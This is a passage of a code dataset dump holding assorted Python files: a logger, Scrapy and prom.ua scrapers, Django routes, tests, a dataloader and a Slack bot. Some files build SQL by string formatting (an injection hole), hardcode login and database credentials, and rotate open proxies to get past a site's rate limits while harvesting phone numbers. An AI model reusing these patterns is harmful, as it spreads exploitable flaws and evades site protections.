config)\n","sub_path":"tests/test_api/test_api_state.py","file_name":"test_api_state.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"358026764","text":"# Reverse a string function - instead of using 'reversed' or [::-1]\n\ndef reverse(text):\n string = []\n length = len(text)-1\n while len(string) < len(text):\n string.append(text[length])\n length -= 1\n\n return ''.join(string)","sub_path":"reverse.py","file_name":"reverse.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"445476930","text":"\nimport pika\nimport mysql.connector\nfrom datetime import date\n\nclass Logs:\n def __init__(self, hostname):\n self.hostname = hostname\n self.conn = mysql.connector.connect(\n user='root',\n password='test',\n host='MySQLServiceDB',\n database='LogDB')\n self.cursor = self.conn.cursor()\n\n def send(self, msg):\n datte = date.today()\n datte = str(datte)\n self.connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.hostname))\n channel = self.connection.channel()\n channel.queue_declare(queue='my_queue')\n channel.basic_publish(exchange='',\n routing_key='my_queue',\n body=msg)\n self.cursor.execute(\"INSERT INTO logs (message, creation_date) VALUES ('{}', '{}')\".format(msg, datte))\n self.conn.commit()\n self.connection.close()\n\n def recieve(self):\n self.connection = pika.BlockingConnection(pika.ConnectionParameters(host=self.hostname))\n channel = self.connection.channel()\n channel.queue_declare(queue='my_queue')\n def callback(ch, method, properties, body):\n print(\" [x] Received %r\" % body)\n channel.basic_consume(queue='my_queue',\n on_message_callback=callback,\n auto_ack=True)\n print(' [*] Waiting for logs. To exit press CTRL+C')\n channel.start_consuming()\n","sub_path":"python_movies_service_api/logs/LogsObject.py","file_name":"LogsObject.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"476272377","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom scrapy.contrib.linkextractors import LinkExtractor\n#from scrapy.selector import HtmlXPathSelector\nfrom scrapy.selector import Selector\nfrom scrapy.contrib.spiders import CrawlSpider, Rule\nfrom sis001crawl.items import Sis001CrawlItem\nfrom scrapy.http import Request,FormRequest\nfrom scrapy import log\nimport requests\nimport re\n\n\n\n\nclass Sis001botSpider(CrawlSpider):\n\tname = 'sis001bot'\n\tallowed_domains = ['38.103.161.185']\n\tstart_urls = ['http://38.103.161.185/forum/forum-411-1.html']\n\t#rules = (Rule(LinkExtractor(allow=r'forum-25-[1-9].html'), callback='topicparse', follow=True),)\n\t\n\tdef parse(self,response):\n\t\tpages = []\n\t\tx = 2\n\t\tfor page in range(1,x):\n\t\t\tnextpage = 'http://38.103.161.185/forum/forum-411-'+str(page)+'.html'\n\t\t\tpages.append(nextpage)\t\n\t\tfor page in pages:\n\t\t\tself.log(\"page is %s\"%page)\n\t\t\tyield Request(page,callback=self.topicparse)\t\t\n\t\n\tdef topicparse(self,response):\n\t\ti = Sis001CrawlItem()\n\t\ti['topic_urls'] = response.xpath(\"//tbody/tr/th/span/a/@href\").extract()\n\t\t#self.log(\"-----[[%s]]\"%i['topic_urls'])\n\t\ttopic_urls = []\n\t\tfor url in i['topic_urls']:\n\t\t\tif re.match('thread-\\d{1,}-1-\\d{1,}.html',url):\n\t\t\t\turl = 'http://38.103.161.185/forum/'+url\n\t\t\t\t#self.log(\"-----%s\"%url)\n\t\t\t\ttopic_urls.append(url)\n\t\t#self.log(\"-----%s\"%topic_urls)\n\t\tfor topic in topic_urls:\n\t\t\tyield Request(topic,callback=self.imgparse)\t\n\t\t\t\n\tdef imgparse(self,response):\n\t\ti = Sis001CrawlItem()\n\t\tsel = Selector(response)\n\t\t#self.log(\"---------%s\"%url)\n\t\ti['headTitle'] = response.xpath('/html/head/title/text()').extract()\n\t\ti['imgurl'] = sel.xpath('//img/@src').re('.*?\\.jpg')\n\t\treturn i\n\t\n\tdef start_requests(self):\n\t\treturn[FormRequest(\n\t\t\t\"http://38.103.161.185/forum/logging.php?action=login\",\n\t\t\tformdata = {\n\t\t\t\"formhash\":\"%s\"%hash,\n\t\t\t\"referer\":\"http://38.103.161.185/forum/index.php\",\n\t\t\t\"loginfield\":\"username\",\n\t\t\t\"62838ebfea47071969cead9d87a2f1f7\":\"volstad\",\n\t\t\t\"c95b1308bda0a3589f68f75d23b15938\":\"194105\",\n\t\t\t\"questionid\":\"4\",\n\t\t\t\"answer\":b\"\\xd0\\xec\\xc0\\xf6\\xbb\\xaa\",#\"answer\":\"\\xd0\\xec\\xc0\\xf6\\xbb\\xaa\",\n\t\t\t\"cookietime\":\"2592000\",\n\t\t\t\"loginmode\":\"\",\n\t\t\t\"styleid\":\"\",\n\t\t\t\"loginsubmit\":\"true\"},\n\t\t\tcallback = self.after_login\t\t\n\t\t)]\n\t\t\n\tdef after_login(self, response):\n\t\tfor url in self.start_urls:\n\t\t\tyield self.make_requests_from_url(url)\n\n\tdef getHash(self):\n\t\thash_html = requests.get('http://38.103.161.185/forum/logging.php?action=login',headers=self.browse_headers)\n\t\thash = re.findall(b'',hash_html.content)\n\t\thash = hash.pop()\n\t\treturn hash\t\t\n\n\t\t\t\n","sub_path":"sis001crawl/spiders/sis001bot.py","file_name":"sis001bot.py","file_ext":"py","file_size_in_byte":2581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"377752703","text":"#! -*- encoding=utf-8 -*-\nfrom django.urls import path, include\nfrom . import views\n\n# 应用路由说明\n# list/\n# list/\n# \n# \n# \n# \n# \n# \n# \n# 返回列表的url\nextra_list_patterns = [\n path('', views.TasksForPageListView.as_view(), \n name='tasks-first-page-list'),\n path('', views.TasksForPageListView.as_view(), \n name='tasks-paged-list'),\n path('deadline/', views.TasksForDateListView.as_view(),\n name='tasks-deadline-list'),\n path('priority//', views.TasksForPriorityListView.as_view(),\n name='tasks-priority-list'),\n path('project//', views.TasksForProjectListView.as_view(),\n name='tasks-project-list'),\n path('tag//', views.TasksForTagListView.as_view(),\n name='tasks-tag-list')\n]\n\n# 返回详情的url\nextra_detail_patterns = [\n path('', views.TaskDetailView.as_view(),\n name='task-detail'),\n]\n\n# 返回操作的url\nextra_operation_patterns = [\n path('destory/', views.TaskDeleteView.as_view(),\n name='delete-a-task'),\n path('edit/', views.TaskEditView.as_view(),\n name='edit-a-task'),\n path('create', views.TaskCreateView.as_view(),\n name='create-a-task'),\n path('done/', views.TaskDoneView.as_view(),\n name='done-a-task')\n]\n\n# 集成url\nurlpatterns = [\n path('list/', include(extra_list_patterns)),\n path('detail/', include(extra_detail_patterns)),\n path('operation/', include(extra_operation_patterns))\n]\n","sub_path":"todoBackend/todolist/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"597949294","text":"#!/usr/bin/python3\n\"\"\"Module to Find state (only one)\n\"\"\"\nimport MySQLdb\nimport sys\n\n\nif __name__ == '__main__':\n db = MySQLdb.connect('localhost', sys.argv[1], sys.argv[2], sys.argv[3])\n cursor = db.cursor()\n\n sql = \"SELECT * FROM states WHERE name=%s ORDER BY states.id ASC\"\n cursor.execute(sql , (sys.argv[4],))\n data = cursor.fetchall()\n for item in data:\n print(item)\n db.close()\n","sub_path":"0x0F-python-object_relational_mapping/3-my_safe_filter_states.py","file_name":"3-my_safe_filter_states.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"534689861","text":"from unittest.mock import MagicMock\nfrom nose.tools import with_setup\nfrom dapla.magics.blueprint import Blueprint\n\nmagic = None\nshell = None\nipython_display = None\n\n\ndef _setup():\n global magic, spark_controller, shell, ipython_display\n\n magic = Blueprint(shell=None)\n magic.shell = shell = MagicMock()\n magic.shell.user_ns = {}\n magic.ipython_display = ipython_display = MagicMock()\n\n\ndef _teardown():\n pass\n\n\n@with_setup(_setup, _teardown)\ndef test_define_input():\n cell = \"alias /some/path\"\n magic.define_input(None, cell)\n assert magic._input_datasets == {'alias': {'dataset': None, 'path': '/some/path'}}\n ref = magic.get_input(\"alias\")\n assert ref['path'] == \"/some/path\"\n\n@with_setup(_setup, _teardown)\ndef test_register_input():\n cell = \"alias /some/path\"\n magic.define_input(None, cell)\n magic.shell.user_ns['realdataset'] = {'dataset': 'dummy'}\n magic.register_input_dataset(\"alias realdataset\")\n ref = magic.get_input(\"alias\")\n assert ref['dataset'] == {'dataset': 'dummy'}\n\n@with_setup(_setup, _teardown)\ndef test_define_output():\n cell = \"alias /some/path\"\n magic.define_output(None, cell)\n assert magic._output_datasets == {'alias': {'dataset': None, 'path': '/some/path'}}\n ref = magic.get_output(\"alias\")\n assert ref['path'] == \"/some/path\"\n","sub_path":"tests/test_blueprint.py","file_name":"test_blueprint.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"505108451","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nr\"\"\"\nLife's pathetic, have fun (\"▔□▔)/hi~♡ Nasy.\n\nExcited without bugs::\n\n | * *\n | . .\n | .\n | * ,\n | .\n |\n | *\n | |\\___/|\n | ) -( . ·\n | =\\ - /=\n | )===( *\n | / - \\\n | |- |\n | / - \\ 0.|.0\n | NASY___\\__( (__/_____(\\=/)__+1s____________\n | ______|____) )______|______|______|______|_\n | ___|______( (____|______|______|______|____\n | ______|____\\_|______|______|______|______|_\n | ___|______|______|______|______|______|____\n | ______|______|______|______|______|______|_\n | ___|______|______|______|______|______|____\n\nauthor : Nasy https://nasy.moe\ndate : Feb 21, 2019\nemail : Nasy \nfilename : nautc.py\nproject : nautc\n\nThere are more things in heaven and earth, Horatio, than are dreamt.\n -- From \"Hamlet\"\n\"\"\"\n__version__ = \"0.1.0\"\n# Standard Library\nimport re\nimport sys\nimport html\nfrom typing import Tuple, Iterator\nfrom urllib.parse import quote\n\n# Web Packages\nimport requests as req\n\nURL = \"http://qaz.wtf/u/convert.cgi?text={}\"\nUTC = re.compile(\n r\"(.*?)(.*?)(.*?)\", re.S\n)\n\n\ndef nautc(text: str) -> Iterator[Tuple[str, str]]:\n \"\"\"Convert plain text to obscure characters from Unicode.\"\"\"\n return map(\n lambda x: (x[0] + x[1], html.unescape(x[2])),\n UTC.findall(req.get(URL.format(quote(text))).text),\n )\n\n\n__all__ = [\"nautc\"]\n\n\ndef main() -> None:\n \"\"\"Main function.\"\"\"\n for n, s in nautc(\n not sys.stdin.isatty() and sys.stdin.read() or \"\".join(sys.argv[1:])\n ):\n print(n + s + (\"-\" * 20))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"nautc.py","file_name":"nautc.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"480181980","text":"import argparse\nimport os\nimport numpy as np\nimport imageio\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nimport torch\n\nfrom torch.utils import data\nfrom torchvision import transforms\n\n\nparser = argparse.ArgumentParser(description='PyTorch dataloader')\nparser.add_argument('data', metavar='DIR',\n help='path to dataset')\nparser.add_argument('-j', '--workers', default=12, type=int, metavar='N',\n help='number of data loading workers (default: 12)')\nparser.add_argument('-b', '--batch-size', default=8, type=int,\n metavar='N', help='mini-batch size (default: 8)')\n\n\ndef calc_padding(height, width):\n y_pad = 32 - height % 32\n y_min_pad = int(y_pad / 2)\n y_max_pad = y_pad - y_min_pad\n \n x_pad = 32 - width % 32\n x_min_pad = int(x_pad / 2)\n x_max_pad = x_pad - x_min_pad\n\n return x_min_pad, y_min_pad, x_max_pad, y_max_pad\n\n\nclass TGSSaltDataset(data.Dataset):\n def __init__(self, root_path, file_list, transform=None, test_mode=False):\n self.root_path = root_path\n self.file_list = file_list\n self.transform = transform\n self.test_mode = test_mode\n\n def __len__(self):\n return len(self.file_list)\n \n def _load_image(self, image_path):\n return Image.open(image_path).convert('L')\n\n def __getitem__(self, index):\n if index not in range(0, len(self.file_list)):\n return self.__getitem__(np.random.randint(0, self.__len__()))\n \n file_id = self.file_list[index]\n \n image_folder = os.path.join(self.root_path, \"images\")\n image_path = os.path.join(image_folder, file_id + \".png\")\n \n # mask_folder = os.path.join(self.root_path, \"masks\")\n # mask_path = os.path.join(mask_folder, file_id + \".png\")\n \n # image = np.array(imageio.imread(image_path), dtype=np.uint8)\n # mask = np.array(imageio.imread(mask_path), dtype=np.uint8)\n if not self.test_mode:\n mask_folder = os.path.join(self.root_path, \"masks\")\n mask_path = os.path.join(mask_folder, file_id + \".png\")\n image, mask = self._load_image(image_path), self._load_image(mask_path)\n processed_image, processed_mask = self.transform(image), self.transform(mask)\n return processed_image, processed_mask\n else:\n image = self._load_image(image_path)\n processed_image = self.transform(image)\n return processed_image\n\n\n# Debug\nif __name__ == '__main__':\n args = parser.parse_args()\n\n traindir = os.path.join(args.data, 'train')\n testdir = os.path.join(args.data, 'test')\n train_file_list = pd.read_csv(os.path.join(args.data, 'train.csv'))['id']\n test_file_list = pd.read_csv(os.path.join(args.data, 'sample_submission.csv'))['id']\n # normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],\n # std=[0.229, 0.224, 0.225])\n pad = transforms.Pad(padding=calc_padding(height=101, width=101))\n\n train_dataset = TGSSaltDataset(traindir, train_file_list,\n transforms.Compose([pad, transforms.ToTensor()]))\n test_dataset = TGSSaltDataset(testdir, test_file_list, \n transforms.Compose([pad, transforms.ToTensor()]),\n test_mode=True)\n\n train_loader = data.DataLoader(train_dataset, batch_size=args.batch_size, shuffle=True, num_workers=args.workers)\n test_loader = data.DataLoader(test_dataset, batch_size=args.batch_size, num_workers=args.workers)\n \n for i, (image, mask) in enumerate(train_loader):\n print(i, image.max(), mask.max())\n\n # for i, image in enumerate(test_loader):\n # print(i, image.shape)","sub_path":"data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"230260242","text":"from bamboohr import Bamboohr\nimport slack as sl\nfrom datetime import datetime\nimport os\n\n\nSLACK_BOT_TOKEN = os.environ[\"SLACK_BOT_TOKEN\"]\nclient = sl.WebClient(token=SLACK_BOT_TOKEN)\nbamboohr = Bamboohr()\n\n\nclass SlackMessages:\n buttons = [\n {\n \"name\": \"choice\",\n \"text\": \"Post this message to #general\",\n \"type\": \"button\",\n \"value\": \"choice\"\n },\n {\n \"name\": \"cancel\",\n \"text\": \"Cancel\",\n \"type\": \"button\",\n \"value\": \"cancel\"\n }\n ]\n\n def __init__(self, test_channel):\n self.test_channel = test_channel\n\n def send_welcome_message(self):\n newbies_list = bamboohr.check_newbies()\n for i in newbies_list:\n newbie = bamboohr.get_emp_profile_by_id(i).json()\n emp_photo = bamboohr.get_emp_photo_url(i)\n message = f\"*Welcome Our Newest Team Member :vgs: *\\n\" \\\n f\"*{newbie['firstName']} {newbie['lastName']}*\\n\" \\\n f\"\\nHey Team, \\n\\n\" \\\n f\"We are happy to have *{newbie['firstName']} {newbie['lastName']}*\" \\\n f\"join us as *{newbie['jobTitle']}* in :world_map: *{newbie['location']}* office.\\n\" \\\n f\"{newbie['firstName']}'s first day is today, so please take the time to say hi and welcome \" \\\n f\"{newbie['firstName']} to the team :hugging_face::raised_hands::rocket:\"\n message_attachments = [\n {\n \"fallback\": \"Upgrade your Slack client to use messages like these.\",\n \"color\": \"#3AA3E3\",\n \"attachment_type\": \"default\",\n \"callback_id\": \"menu_options_2319\",\n \"pretext\": newbie['firstName'],\n \"image_url\": emp_photo,\n \"actions\": self.buttons\n }\n ]\n client.chat_postMessage(channel=self.test_channel, text=message, as_user='True',\n attachments=message_attachments, unfurl_links=True)\n\n def send_hb_message(self):\n hb_list = bamboohr.check_hb()\n newbies = bamboohr.check_newbies()\n if len(hb_list) > 2:\n message_full_names = ''\n message_names = ''\n for i in hb_list:\n hb_one = bamboohr.get_emp_profile_by_id(i)\n if hb_one:\n hb_one = hb_one.json()\n else:\n continue\n if hb_one['id'] in newbies:\n continue\n message_full_names += hb_one['firstName'] + ' ' + hb_one['lastName'] + ', '\n message_names += hb_one['firstName'] + ', '\n message_full_names = message_full_names[:-2]\n message = f\"Let’s start today’s day with warm congrats to *{message_full_names}*.\" \\\n f\"\\nWe all wish you an unforgettable day today and a fantastic year ahead!:hugging_face::tada:\" \\\n f\"\\nExtremely happy to have you at VGS:vgs::rocket:\" \\\n f\"\\nhttp://bestanimations.com/Holidays/Birthday/birthdaygifs/happy-birthday-colorful-type-animated-gif.gif\"\n message_attachments = [\n {\n \"fallback\": \"Upgrade your Slack client to use messages like these.\",\n \"color\": \"#3AA3E3\",\n \"attachment_type\": \"default\",\n \"callback_id\": \"menu_options_2319\",\n \"actions\": self.buttons\n }\n ]\n client.chat_postMessage(channel=self.test_channel, text=message, as_user='True',\n attachments=message_attachments, unfurl_links=True)\n else:\n for i in hb_list:\n hb_one = bamboohr.get_emp_profile_by_id(i)\n emp_photo = bamboohr.get_emp_photo_url(i)\n if hb_one:\n hb_one = hb_one.json()\n if hb_one in newbies:\n continue\n message = f\"Let’s start today’s day with warm congrats to *{hb_one['firstName']} {hb_one['lastName']}*.\" \\\n f\"\\nWe all wish you an unforgettable day today and a fantastic year ahead!:hugging_face::tada:\" \\\n f\"\\nExtremely happy to have you at VGS:vgs::rocket:\"\n message_attachments = [\n {\n \"fallback\": \"Upgrade your Slack client to use messages like these.\",\n \"color\": \"#3AA3E3\",\n \"attachment_type\": \"default\",\n \"callback_id\": \"menu_options_2319\",\n \"pretext\": hb_one['firstName'],\n \"image_url\": emp_photo,\n \"actions\": self.buttons\n }\n ]\n client.chat_postMessage(channel=self.test_channel, text=message, as_user='True',\n attachments=message_attachments, unfurl_links=True)\n\n def send_anniversary_message(self):\n anniversary_list = bamboohr.check_anniversary()\n newbies = bamboohr.check_newbies()\n if len(anniversary_list) > 2:\n message_full_names = ''\n message_names = ''\n for i in anniversary_list:\n anniversary_one = bamboohr.get_emp_profile_by_id(i[0])\n if anniversary_one:\n anniversary_one = anniversary_one.json()\n else:\n continue\n if anniversary_one['id'] in newbies:\n continue\n message_full_names += anniversary_one['firstName'] + ' ' + anniversary_one['lastName'] + ', '\n message_names += anniversary_one['firstName'] + ', '\n message_full_names = message_full_names[:-2]\n message_names = message_names[:-2]\n message = f\"Let’s take a minute to wish a happy anniversary to *{message_full_names}* at VGS! \" \\\n f\":vgs::hugging_face:\" \\\n f\"\\nWe want to say thank you for all your efforts and achievements that help us get where we are now! \" \\\n f\"\\n*{message_names}*, let the upcoming year at VGS be even more challenging and significant! \" \\\n f\":wink::sparkles::rocket:\" \\\n f\"\\nhttps://tenor.com/view/happyanniversary-gif-13014753\"\n message_attachments = [\n {\n \"fallback\": \"Upgrade your Slack client to use messages like these.\",\n \"color\": \"#3AA3E3\",\n \"attachment_type\": \"default\",\n \"callback_id\": \"menu_options_2319\",\n \"actions\": self.buttons\n }\n ]\n client.chat_postMessage(channel=self.test_channel, text=message, as_user='True',\n attachments=message_attachments, unfurl_links=True)\n else:\n for i in anniversary_list:\n anniversary_one = bamboohr.get_emp_profile_by_id(i[0])\n if anniversary_one:\n anniversary_one = anniversary_one.json()\n else:\n continue\n if anniversary_one['id'] in newbies:\n continue\n emp_photo = bamboohr.get_emp_photo_url(i[0])\n years = str(int(datetime.today().strftime('%Y')) - int(i[1]))\n message = f\"Let’s take a minute to wish a happy {years} years anniversary to *{anniversary_one['firstName']} \" \\\n f\"{anniversary_one['lastName']}* at VGS! :vgs::hugging_face:\" \\\n f\"\\nWe want to say thank you for all your efforts and achievements that help us get where we are now! \" \\\n f\"\\n{anniversary_one['firstName']}, let the upcoming year at VGS \" \\\n f\"be even more challenging and significant! :wink::sparkles::rocket:\"\n message_attachments = [\n {\n \"fallback\": \"Upgrade your Slack client to use messages like these.\",\n \"color\": \"#3AA3E3\",\n \"pretext\": anniversary_one['firstName'],\n \"image_url\": emp_photo,\n \"attachment_type\": \"default\",\n \"callback_id\": \"menu_options_2319\",\n \"actions\": self.buttons\n }\n ]\n client.chat_postMessage(channel=self.test_channel, text=message, as_user='True',\n attachments=message_attachments, unfurl_links=True)\n","sub_path":"slack_messages.py","file_name":"slack_messages.py","file_ext":"py","file_size_in_byte":8682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"265622344","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPython3.5\nChange conf/main.json with category URL\n\n~ 1000 connection limit from 1 IP\n\ntemp.json is for tracking what page was parsed. Structure example:\n{\n \"url\": \"https://prom.ua/Komplektuyuschie-dlya-holodilnogo-i-teploobmennogo-oborudovaniya\",\n \"pages_collected\": false\n}\n\n\"\"\"\nimport time\nimport json\nimport urllib.request\nimport pymysql\nimport random\n\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\nfrom pathlib import Path\n\nconfig_path = 'conf/main.json'\nconfig_file = Path(config_path)\nif not config_file.is_file():\n raise FileNotFoundError\n\n\ndef get_from_config(key):\n with open(config_path) as f:\n data = json.load(f)\n return data.get(key)\n\n\ndb = pymysql.connect(**get_from_config('db'))\ncur = db.cursor()\n\n\ndebug = get_from_config('debug')\nsleep = get_from_config('sleep')\npages = get_from_config('urls_path')\nsave_to_mysql = get_from_config('to_mysql')\n\n\ndef install_proxy():\n proxies = ['138.97.147.238:44648', '115.85.68.99:48256', '195.200.237.22:8080', ' 213.234.29.164:8080',\n '188.68.106.152:56532', '79.115.245.227:8080', '194.237.247.227:58820', '180.254.48.155:3128',\n '91.144.139.93:3128', '177.52.250.126:8080', '209.33.120.66:57679', '183.89.202.114:3128']\n\n proxy = urllib.request.ProxyHandler({'https': random.choice(proxies)})\n opener = urllib.request.build_opener(proxy)\n urllib.request.install_opener(opener)\n\n\ndef category_page_urls_are_saved():\n result = False\n temp_config_path = 'conf/temp.json'\n with open(temp_config_path) as f:\n data = json.load(f)\n if data['pages_collected']:\n result = True\n return result\n\n\ndef save_to_csv(title, location, phone_numbers):\n title = title.encode('utf-8', 'replace').decode('utf-8')\n location = location.encode('utf-8', 'replace').decode('utf-8')\n phone_numbers = u' '.join(phone_numbers).encode('utf-8').strip()\n line = '{};{};{};\\n'.format(title, location, phone_numbers)\n with open('results.csv', 'ab+') as f:\n f.write(bytes(line.encode('utf-8')))\n\n\ndef save_to_temp_config(category_url):\n data = {\n \"url\": category_url,\n \"pages_collected\": True\n }\n fp = open('conf/temp.json', 'w+')\n fp.write(json.dumps(data))\n\n\ndef remove_url_from_queue(url):\n fp = open(pages, 'r')\n lines = fp.readlines()\n fp.close()\n f = open(pages, \"w\")\n f.seek(0)\n for i in lines:\n if i != url:\n f.write(i)\n f.truncate()\n f.close()\n\n\ndef collect_urls_from_category():\n \"\"\"\n Checking if temp config exists to see if we are already scraped page_urls\n \"\"\"\n category_url = get_from_config('category')\n\n if category_page_urls_are_saved():\n return\n\n else:\n if category_url:\n if debug:\n with open('debug/category.html', encoding='utf-8') as url:\n html_doc = url.read()\n else:\n with urllib.request.urlopen(category_url) as url:\n html_doc = url.read()\n soup = BeautifulSoup(html_doc, 'html.parser')\n pagination = soup.find_all('a', class_='x-pager__item')\n nums = []\n for page_num in pagination:\n nums.append(page_num.get_text())\n last_num_in_pagination = str(nums[2]).strip()\n\n if last_num_in_pagination:\n for num in range(2, int(last_num_in_pagination) + 1):\n with open(pages, 'a') as fp:\n fp.write('{};{}\\n'.format(category_url, num))\n save_to_temp_config(category_url)\n\n\ndef all_pages():\n fp = open(pages, 'r')\n return fp.readlines()\n\n\ndef save_to_db(t, l, p):\n sql = \"INSERT INTO `prom` (`title`, `location`, `phone`) VALUES (%s, %s, %s)\"\n cur.execute(sql, (t, l, '\\n'.join(p)))\n db.commit()\n\n\ndef fetch_category(category_url):\n if debug:\n with open('debug/category.html', encoding='utf-8') as url:\n html_doc = url.read()\n else:\n with urllib.request.urlopen(category_url) as url:\n html_doc = url.read()\n time.sleep(sleep+0.5)\n soup = BeautifulSoup(html_doc, 'html.parser')\n products = soup.find_all('div', class_='x-gallery-tile__content')\n for p in products:\n product_page = p.find('a', class_='x-image-holder').get('href')\n fetch_page(product_page)\n\n\ndef fetch_page(page_url):\n\n if debug:\n with open('debug/int_page.htm', encoding='utf-8') as url:\n html_doc = url.read()\n else:\n with urllib.request.urlopen(page_url) as url:\n html_doc = url.read()\n time.sleep(sleep)\n soup = BeautifulSoup(html_doc, 'html.parser')\n phones = soup.find_all('span', class_='js-product-ad-conv-action')\n try:\n numbers = phones[-1].attrs['data-pl-phones']\n except:\n numbers = None\n\n phone_numbers = []\n if numbers:\n json_numbers = json.loads(numbers)\n for number in json_numbers:\n phone_numbers.append(number.get('number'))\n\n try:\n title = soup.find('a', class_='x-company-info__name').get_text()\n except:\n title = None\n\n location = None\n side_panel = soup.find_all('span', class_='x-iconed-text__link')\n for l in side_panel:\n if l.attrs.get('data-qaid'):\n if l.attrs['data-qaid'] == 'company_location':\n location = l.get_text().strip()\n\n print('[>] {} \\n {} \\n {}'.format(title, location, phone_numbers))\n if save_to_mysql:\n save_to_db(title, location, phone_numbers)\n else:\n save_to_csv(title, location, phone_numbers)\n\n\ntoo_many_requests = False\ncollect_urls_from_category()\nfor page in all_pages():\n if page:\n print('[>] CATEGORY: {}'.format(page))\n try:\n if too_many_requests:\n install_proxy()\n fetch_category(page)\n remove_url_from_queue(page)\n except HTTPError:\n too_many_requests = True\n print('[!] Too many requests: switching to proxies. You can use https://www.tunnelbear.com/ instead')\n continue\n\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"189796862","text":"import paddle\nfrom skimage import color\nimport numpy as np\nfrom PIL import Image\n\ndef convertLAB2RGB( lab ):\n lab[:, :, 0:1] = lab[:, :, 0:1] * 100 # [0, 1] -> [0, 100]\n lab[:, :, 1:3] = np.clip(lab[:, :, 1:3] * 255 - 128, -100, 100) # [0, 1] -> [-128, 128]\n rgb = color.lab2rgb( lab.astype(np.float64) )\n return rgb\n\ndef convertRGB2LABTensor( rgb ):\n lab = color.rgb2lab( np.asarray( rgb ) ) # RGB -> LAB L[0, 100] a[-127, 128] b[-128, 127]\n ab = np.clip(lab[:, :, 1:3] + 128, 0, 255) # AB --> [0, 255]\n ab = paddle.to_tensor(ab.astype('float32')) / 255.\n L = lab[:, :, 0] * 2.55 # L --> [0, 255]\n L = Image.fromarray( np.uint8( L ) )\n\n L = paddle.to_tensor(np.array(L).astype('float32')[..., np.newaxis] / 255.0)\n return L, ab\n\ndef addMergin(img, target_w, target_h, background_color=(0,0,0)):\n width, height = img.size\n if width==target_w and height==target_h:\n return img\n scale = max(target_w,target_h)/max(width, height)\n width = int(width*scale/16.)*16\n height = int(height*scale/16.)*16\n\n img = img.resize((width, height), Image.BICUBIC)\n xp = (target_w-width)//2\n yp = (target_h-height)//2\n result = Image.new(img.mode, (target_w, target_h), background_color)\n result.paste(img, (xp, yp))\n return result\n","sub_path":"applications/DeepRemaster/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"141241023","text":"import os\nimport os.path as osp\n\nfrom summit.experiment import Experiment\n\nimport numpy as np\n\nfrom summit.benchmarks.experiment_emulator.bnn_emulator import BNNEmulator\nfrom summit.utils.dataset import DataSet\nfrom summit.domain import *\nfrom summit.utils import jsonify_dict, unjsonify_dict\n\n\nclass ExperimentalEmulator(Experiment):\n \"\"\"Experimental Emulator\n\n Parameters\n ---------\n domain: summit.domain.Domain\n The domain of the experiment\n dataset: class:~summit.utils.dataset.DataSet, optional\n A DataSet with data for training where the data columns correspond to the domain and the data rows correspond to the training points.\n By default: None\n csv_dataset: string, optional\n Path to csv_file with data for training where columns correspond to the domain and the rows correspond to the training points.\n Note that the first row should exactly match the variable names of the domain and the second row should only have \"DATA\" as entry.\n By default: None\n model_name: string, optional\n Name of the model that is used for saving model parameters. Should be unique.\n By default: \"dataset_emulator_model_name\"\n regressor_type: string, optional\n Type of the regressor that is used within the emulator (available: \"BNN\").\n By default: \"BNN\"\n cat_to_descr: Boolean, optional\n If True, transform categorical variable to one or more continuous variable(s)\n corresponding to the descriptors of the categorical variable (else do nothing).\n By default: False\n\n Examples\n --------\n >>> test_domain = ReizmanSuzukiEmulator().domain\n >>> e = ExperimentalEmulator(domain=test_domain, model_name=\"Pytest\")\n No trained model for Pytest. Train this model with ExperimentalEmulator.train() in order to use this Emulator as an virtual Experiment.\n >>> columns = [v.name for v in e.domain.variables]\n >>> train_values = {(\"catalyst\", \"DATA\"): [\"P1-L2\", \"P1-L7\", \"P1-L3\", \"P1-L3\"], (\"t_res\", \"DATA\"): [60, 120, 110, 250], (\"temperature\", \"DATA\"): [110, 30, 70, 80], (\"catalyst_loading\", \"DATA\"): [0.508, 0.6, 1.4, 1.3], (\"yield\", \"DATA\"): [20, 40, 60, 34], (\"ton\", \"DATA\"): [33, 34, 21, 22]}\n >>> train_dataset = DataSet(train_values, columns=columns)\n >>> e.train(train_dataset, verbose=False, cv_fold=2, test_size=0.25)\n >>> columns = [v.name for v in e.domain.variables]\n >>> values = [float(v.bounds[0] + 0.6 * (v.bounds[1] - v.bounds[0])) if v.variable_type == 'continuous' else v.levels[-1] for v in e.domain.variables]\n >>> values = np.array(values)\n >>> values = np.atleast_2d(values)\n >>> conditions = DataSet(values, 